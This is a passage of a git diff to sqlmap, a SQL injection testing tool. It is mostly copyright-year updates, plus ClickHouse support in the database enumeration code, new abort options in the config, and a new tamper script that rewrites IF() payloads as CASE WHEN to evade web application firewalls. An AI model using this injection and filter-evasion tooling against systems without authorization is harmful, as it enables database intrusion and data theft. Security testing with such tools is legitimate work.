- if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery
@@ -757,7 +757,7 @@ class Databases(object):
condQueryStr = "%%s%s" % colCondParam
condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList))
- if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery
@@ -838,7 +838,7 @@ class Databases(object):
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
query = query.replace(" ORDER BY ", "%s ORDER BY " % condQuery)
field = None
- elif Backend.isDbms(DBMS.MONETDB):
+ elif Backend.getIdentifiedDbms() in (DBMS.MONETDB, DBMS.CLICKHOUSE):
query = safeStringFormat(rootQuery.blind.query, (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db), index))
field = None
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE):
@@ -880,7 +880,7 @@ class Databases(object):
singleTimeWarnMessage(warnMsg)
if not onlyColNames:
- if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db))
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper()))
diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py
index 365fad204..84b1c0e03 100644
--- a/plugins/generic/entries.py
+++ b/plugins/generic/entries.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -239,7 +239,7 @@ class Entries(object):
entries = BigArray(_zip(*[entries[colName] for colName in colList]))
else:
query = rootQuery.inband.query % (colString, conf.db, tbl)
- elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO):
+ elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0])
else:
query = rootQuery.inband.query % (colString, conf.db, tbl)
@@ -408,7 +408,7 @@ class Entries(object):
if column not in entries:
entries[column] = BigArray()
- if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index)
diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py
index 95bdbfb71..f09876f1e 100644
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
index 2c073c78e..4c046f645 100644
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py
index 0ac3e2b0f..0bdcb35c1 100644
--- a/plugins/generic/fingerprint.py
+++ b/plugins/generic/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py
index f3459c8c9..f061d5851 100644
--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/generic/search.py b/plugins/generic/search.py
index 12195a161..bb670b718 100644
--- a/plugins/generic/search.py
+++ b/plugins/generic/search.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/generic/syntax.py b/plugins/generic/syntax.py
index 9d1da3e20..146a71324 100644
--- a/plugins/generic/syntax.py
+++ b/plugins/generic/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py
index edb067a3b..429653b00 100644
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/generic/users.py b/plugins/generic/users.py
index 0b658f2b0..ddef85a2a 100644
--- a/plugins/generic/users.py
+++ b/plugins/generic/users.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/sqlmap.conf b/sqlmap.conf
index ecab1a5c5..895b60115 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -101,8 +101,12 @@ authCred =
# Syntax: key_file
authFile =
+# Abort on (problematic) HTTP error code (e.g. 401).
+# Valid: string
+abortCode =
+
# Ignore (problematic) HTTP error code (e.g. 401).
-# Valid: integer
+# Valid: string
ignoreCode =
# Ignore system default proxy settings.
@@ -702,6 +706,9 @@ sessionFile =
# Log all HTTP traffic into a textual file.
trafficFile =
+# Abort data retrieval on empty results.
+abortOnEmpty = False
+
# Set predefined answers (e.g. "quit=N,follow=N").
answers =
diff --git a/sqlmap.py b/sqlmap.py
index 93bc145aa..be312f97f 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -64,7 +64,6 @@ try:
from lib.core.common import setPaths
from lib.core.common import weAreFrozen
from lib.core.convert import getUnicode
- from lib.core.common import MKSTEMP_PREFIX
from lib.core.common import setColor
from lib.core.common import unhandledExceptionMessage
from lib.core.compat import LooseVersion
@@ -73,6 +72,7 @@ try:
from lib.core.data import conf
from lib.core.data import kb
from lib.core.datatype import OrderedSet
+ from lib.core.enums import MKSTEMP_PREFIX
from lib.core.exception import SqlmapBaseException
from lib.core.exception import SqlmapShellQuitException
from lib.core.exception import SqlmapSilentQuitException
@@ -436,6 +436,11 @@ def main():
logger.critical(errMsg)
raise SystemExit
+ elif any(_ in errMsg for _ in (": 9.9.9#",)):
+ errMsg = "LOL :)"
+ logger.critical(errMsg)
+ raise SystemExit
+
elif kb.get("dumpKeyboardInterrupt"):
raise SystemExit
@@ -457,7 +462,7 @@ def main():
dataToStdout(excMsg)
raise SystemExit
- elif any(_ in excMsg for _ in ("ImportError", "ModuleNotFoundError", " returned NULL without setting an exception", "source code string cannot contain null bytes", "No module named", "tp_name field", "module 'sqlite3' has no attribute 'OperationalError'")):
errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip()
logger.critical(errMsg)
raise SystemExit
diff --git a/sqlmapapi.py b/sqlmapapi.py
index 35a1f3edc..2bcb2a2bb 100755
--- a/sqlmapapi.py
+++ b/sqlmapapi.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/0eunion.py b/tamper/0eunion.py
index 1a84ac380..84587ee4d 100644
--- a/tamper/0eunion.py
+++ b/tamper/0eunion.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/__init__.py b/tamper/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/tamper/__init__.py
+++ b/tamper/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py
index 26b7c5233..67b38d31c 100644
--- a/tamper/apostrophemask.py
+++ b/tamper/apostrophemask.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py
index d65fcda5e..c9334100e 100644
--- a/tamper/apostrophenullencode.py
+++ b/tamper/apostrophenullencode.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py
index 46e8ed626..7c5658597 100644
--- a/tamper/appendnullbyte.py
+++ b/tamper/appendnullbyte.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/base64encode.py b/tamper/base64encode.py
index 070442c7e..d813876d1 100644
--- a/tamper/base64encode.py
+++ b/tamper/base64encode.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/between.py b/tamper/between.py
index 5f4405757..d101f210e 100644
--- a/tamper/between.py
+++ b/tamper/between.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/binary.py b/tamper/binary.py
index 82ca49b3d..24bdcbca1 100644
--- a/tamper/binary.py
+++ b/tamper/binary.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py
index 3363226eb..8804a3a9b 100644
--- a/tamper/bluecoat.py
+++ b/tamper/bluecoat.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py
index f14e6558a..bb0c4ca17 100644
--- a/tamper/chardoubleencode.py
+++ b/tamper/chardoubleencode.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/charencode.py b/tamper/charencode.py
index 9c2bd1b61..f676cab8b 100644
--- a/tamper/charencode.py
+++ b/tamper/charencode.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py
index 1005ca739..fd0427f0c 100644
--- a/tamper/charunicodeencode.py
+++ b/tamper/charunicodeencode.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/charunicodeescape.py b/tamper/charunicodeescape.py
index 136a2a5de..cec28fb8d 100644
--- a/tamper/charunicodeescape.py
+++ b/tamper/charunicodeescape.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/commalesslimit.py b/tamper/commalesslimit.py
index 99464794f..18443bb88 100644
--- a/tamper/commalesslimit.py
+++ b/tamper/commalesslimit.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/commalessmid.py b/tamper/commalessmid.py
index 3764bc6e5..6e652778e 100644
--- a/tamper/commalessmid.py
+++ b/tamper/commalessmid.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/commentbeforeparentheses.py b/tamper/commentbeforeparentheses.py
index dd330250a..fa2b3d8a4 100644
--- a/tamper/commentbeforeparentheses.py
+++ b/tamper/commentbeforeparentheses.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py
index ce269f513..8a4362cdd 100644
--- a/tamper/concat2concatws.py
+++ b/tamper/concat2concatws.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/decentities.py b/tamper/decentities.py
index 4dfb058da..187e352ae 100644
--- a/tamper/decentities.py
+++ b/tamper/decentities.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/dunion.py b/tamper/dunion.py
index 2beeeb974..f4b5cceb2 100644
--- a/tamper/dunion.py
+++ b/tamper/dunion.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py
index 70cdfb2f5..c86d1d48c 100644
--- a/tamper/equaltolike.py
+++ b/tamper/equaltolike.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/equaltorlike.py b/tamper/equaltorlike.py
index d8e160106..67dfdf749 100644
--- a/tamper/equaltorlike.py
+++ b/tamper/equaltorlike.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/escapequotes.py b/tamper/escapequotes.py
index a41a7b496..85531ea67 100644
--- a/tamper/escapequotes.py
+++ b/tamper/escapequotes.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/greatest.py b/tamper/greatest.py
index 92ca931b6..091e722d5 100644
--- a/tamper/greatest.py
+++ b/tamper/greatest.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/halfversionedmorekeywords.py b/tamper/halfversionedmorekeywords.py
index acfc4d2ff..e43870f5a 100644
--- a/tamper/halfversionedmorekeywords.py
+++ b/tamper/halfversionedmorekeywords.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/hex2char.py b/tamper/hex2char.py
index 4fb1408ed..996265384 100644
--- a/tamper/hex2char.py
+++ b/tamper/hex2char.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/hexentities.py b/tamper/hexentities.py
index 0bce83bc0..e60ed8df9 100644
--- a/tamper/hexentities.py
+++ b/tamper/hexentities.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/htmlencode.py b/tamper/htmlencode.py
index b9a772511..0fcdef0c6 100644
--- a/tamper/htmlencode.py
+++ b/tamper/htmlencode.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/if2case.py b/tamper/if2case.py
new file mode 100644
index 000000000..9e82459fa
--- /dev/null
+++ b/tamper/if2case.py
@@ -0,0 +1,67 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.compat import xrange
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGHEST
+
+def dependencies():
+ pass
+
+def tamper(payload, **kwargs):
+ """
+ Replaces instances like 'IF(A, B, C)' with 'CASE WHEN (A) THEN (B) ELSE (C) END' counterpart
+
+ Requirement:
+ * MySQL
+ * SQLite (possibly)
+ * SAP MaxDB (possibly)
+
+ Tested against:
+ * MySQL 5.0 and 5.5
+
+ Notes:
+ * Useful to bypass very weak and bespoke web application firewalls
+ that filter the IF() functions
+
+ >>> tamper('IF(1, 2, 3)')
+ 'CASE WHEN (1) THEN (2) ELSE (3) END'
+ >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)')
+ 'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END'
+ """
+
+ if payload and payload.find("IF") > -1:
+ while payload.find("IF(") > -1:
+ index = payload.find("IF(")
+ depth = 1
+ commas, end = [], None
+
+ for i in xrange(index + len("IF("), len(payload)):
+ if depth == 1 and payload[i] == ',':
+ commas.append(i)
+
+ elif depth == 1 and payload[i] == ')':
+ end = i
+ break
+
+ elif payload[i] == '(':
+ depth += 1
+
+ elif payload[i] == ')':
+ depth -= 1
+
+ if len(commas) == 2 and end:
+ a = payload[index + len("IF("):commas[0]].strip("()")
+ b = payload[commas[0] + 1:commas[1]].lstrip().strip("()")
+ c = payload[commas[1] + 1:end].lstrip().strip("()")
+ newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c)
+ payload = payload[:index] + newVal + payload[end + 1:]
+ else:
+ break
+
+ return payload
diff --git a/tamper/ifnull2casewhenisnull.py b/tamper/ifnull2casewhenisnull.py
index ab1d8a074..e8b5de7d3 100644
--- a/tamper/ifnull2casewhenisnull.py
+++ b/tamper/ifnull2casewhenisnull.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
diff --git a/tamper/ifnull2ifisnull.py b/tamper/ifnull2ifisnull.py
index d8aa5451c..6fac2758f 100644
--- a/tamper/ifnull2ifisnull.py
+++ b/tamper/ifnull2ifisnull.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py
index a2ef93621..8272ec280 100644
--- a/tamper/informationschemacomment.py
+++ b/tamper/informationschemacomment.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/least.py b/tamper/least.py
index cab908790..d59f1a458 100644
--- a/tamper/least.py
+++ b/tamper/least.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/lowercase.py b/tamper/lowercase.py
index efaf360bb..9d49eb3e4 100644
--- a/tamper/lowercase.py
+++ b/tamper/lowercase.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/luanginx.py b/tamper/luanginx.py
index dec6d623c..b302e71d6 100644
--- a/tamper/luanginx.py
+++ b/tamper/luanginx.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/misunion.py b/tamper/misunion.py
index 9737f04ea..9f1c5d957 100644
--- a/tamper/misunion.py
+++ b/tamper/misunion.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py
index 3453c7e1a..25c66f0bc 100644
--- a/tamper/modsecurityversioned.py
+++ b/tamper/modsecurityversioned.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py
index 590404908..0d3ca440e 100644
--- a/tamper/modsecurityzeroversioned.py
+++ b/tamper/modsecurityzeroversioned.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py
index 76122e767..b3cd78c06 100644
--- a/tamper/multiplespaces.py
+++ b/tamper/multiplespaces.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/ord2ascii.py b/tamper/ord2ascii.py
index 3f6c2a57b..b7b0676b4 100644
--- a/tamper/ord2ascii.py
+++ b/tamper/ord2ascii.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py
index 31e31cf1f..ba8de68b5 100644
--- a/tamper/overlongutf8.py
+++ b/tamper/overlongutf8.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/overlongutf8more.py b/tamper/overlongutf8more.py
index a0013c71a..343312e0b 100644
--- a/tamper/overlongutf8more.py
+++ b/tamper/overlongutf8more.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
